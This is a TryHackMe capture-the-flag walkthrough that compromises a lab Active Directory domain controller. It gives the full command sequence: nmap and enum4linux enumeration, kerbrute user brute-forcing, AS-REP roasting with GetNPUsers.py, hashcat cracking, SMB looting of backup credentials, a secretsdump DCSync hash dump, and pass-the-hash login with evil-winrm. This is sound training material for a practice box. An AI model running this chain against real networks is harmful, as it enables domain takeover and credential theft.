Attacktive Directory - TryHackMe Walkthrough
Attacktive Directory - “99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?” This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
URL: Year of the Rabbit
We are given the IP 10.10.62.162. Run an nmap scan with the following command:
nmap -p- -A -o portscan 10.10.113.38
Here are the open ports:
PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-16 15:45:01Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: THM-AD | NetBIOS_Domain_Name: THM-AD | NetBIOS_Computer_Name: ATTACKTIVEDIREC | DNS_Domain_Name: spookysec.local | DNS_Computer_Name: AttacktiveDirectory.spookysec.local | Product_Version: 10.0.17763 |_ System_Time: 2020-06-16T15:47:30+00:00 | ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local | Not valid before: 2020-04-03T18:40:09 |_Not valid after: 2020-10-03T18:40:09 |_ssl-date: 2020-06-16T15:47:44+00:00; +2s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49674/tcp open msrpc Microsoft Windows RPC 49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49676/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49688/tcp open msrpc Microsoft Windows RPC 49696/tcp open msrpc Microsoft Windows RPC 49793/tcp open msrpc Microsoft Windows RPC
Let’s visit port 80:
The image on this page is a link to the following website:
We already know this box will be based around Internet Information Services (IIS).
A lot of ports open which seem to all point towards an Active Directory environment.
We can see Kerberos running on port 88 which is an authentication protocol. This is currently the default authentication technology used by Microsoft to authenticate users to services within a local area network.
Port 445 is also open which indicates a service called the server message block (SMB) over TCP/IP.
Whenever ports 139 and 445 are open, I always start by using enum4linux to enumerate.
enum4linux -A 10.10.113.38
We’ve identified the domain name:
Domain Name: THM-AD
I will be installing a tool called Kerbrute. This essentially bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication, since enum4linux failed to get us any valid credentials.
Let’s install this tool on the local machine with golang
The challenge provides us with username and password wordlists, let’s download them both onto our local machine:
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
Now we can attempt to enumerate the user’s using a brute-force approach with kerberos:
cd ~/go/bin ./kerbrute userenum --dc 10.10.156.50 -d 10.10.156.50 ../../TryHackMe/Attacktive_Directory/userlist.txt -t 100
As you can see, I got a lot of errors when running this command (I like to include errors and mistakes to illustrate how I approach problems).
The error said “KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting…”. Look back a few steps to the nmap scan and we see the domain name as “spookysec.local”:
Let’s put this in our /etc/hosts file, since we are practicing on a local network:
echo "10.10.62.162 spookysec.local" >> /etc/hosts
Now we can re-attempt the kerbrute brute force:
./kerbrute userenum --dc spookysec.local -d spookysec.local ../../TryHackMe/Attacktive_Directory/userlist.txt -t 100
After a few minutes, we have a list of usernames:
2020/06/17 05:04:43 > Using KDC(s): 2020/06/17 05:04:43 > spookysec.local:88 2020/06/17 05:51:27 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:28 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:28 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:28 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:28 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:29 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:29 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:29 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:35 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:36 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:40 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:48 > [+] VALID USERNAME: [email protected] 2020/06/17 05:51:51 > [+] VALID USERNAME: [email protected] 2020/06/17 05:52:02 > [+] VALID USERNAME: [email protected] 2020/06/17 05:52:04 > [+] VALID USERNAME: [email protected] 2020/06/17 05:52:09 > [+] VALID USERNAME: [email protected]
The svc-admin (maybe a service admin account?) and Administrator users look interesting. It’s usually wise to disable the administrator account on a network, but they haven’t here.
We now want to crack Active Directory passwords with AS-REP Roasting. This is an attack against Kerberos for user accounts that do not require preauthentication. This attack is explained nicely on this article:
Pre-authentication is the first step in Kerberos authentication, and is designed to prevent brute-force password guessing attacks.
Although it’s unlikely accounts are ever set up without pre-authentication, it is always possible to find these vulnerable users.
Here is a snapshot of ‘poorly’ configured Kerberos, where pre-authentication has been turned off.
I will be using GetNPUsers.py to retrieve a kerberos ticket (TGT), and attempt to decrypt it. This may pre-installed on your machine, you can find the path with this command:
find / -type f -name 'GetNPUsers.py'
If not, here is a link to the script:
This is a great youtube video I used to understand this script:
Let’s try this out with the two interesting users we validated earlier:
python GetNPUsers.py spookysec.local/Administrator
This user doesn’t seem vulnerable, or it is disabled, as we mentioned before.
python GetNPUsers.py spookysec.local/svc-admin
Great, we have the following result:
Let’s save this to a file called “hash.txt”.
This is a hash value we can attempt to crack using the wordlist they provided in the challenge. I will be using hashcat.
hashcat -m 18200 hash.txt passwordlist.txt --force
“-m 18200” specifies the “mode” we want to use. Use the Hashcat Wiki to read all the different modes when cracking hash values:
Running the hashcat command gives us a password.
Enumerating the Domain Controller
We have some credentials, we have more access within the domain. We want to map the remote SMB shares with smbclient.
smbclient -L spookysec.local --user svc-admin
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backup Disk C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share
The share “backup” seems interesting. Let’s explore this.
smbclient \\\\spookysec.local\\backup --user svc-admin ls
There is a file called “backup_credentials.txt”, this could be the credentials to another user we identified earlier. Transfer this to your local machine.
This looks like it has been encrypted. I used cyberchef to identify and decrypt the hash value:
Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account “backup” gets us thinking. What is this the backup account to?
“Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.
Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.”
^ Taken from the challenge.
We can now attempt to enumerate additional user information, hopefully with NTLM hashes. So let’s use secretdump.py to do this.
Here is a link to the secretdump.py script:
If you followed the impacket installation steps on TryHackMe, the python file will be located here:
secretsdump.py -just-dc [email protected]
We now have a dump of the DC hashes, including the Administrator password hash, guess it hasn’t been disabled :)
We can now either decrypt the NTLM hash and connect as Administrator, or use evil-winrm.
WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.
evil-winrm -i 10.10.156.50 -u Administrator -H e******************************b
Now we are logged in as the Administrator. Each flag is located in the user’s Desktop directory.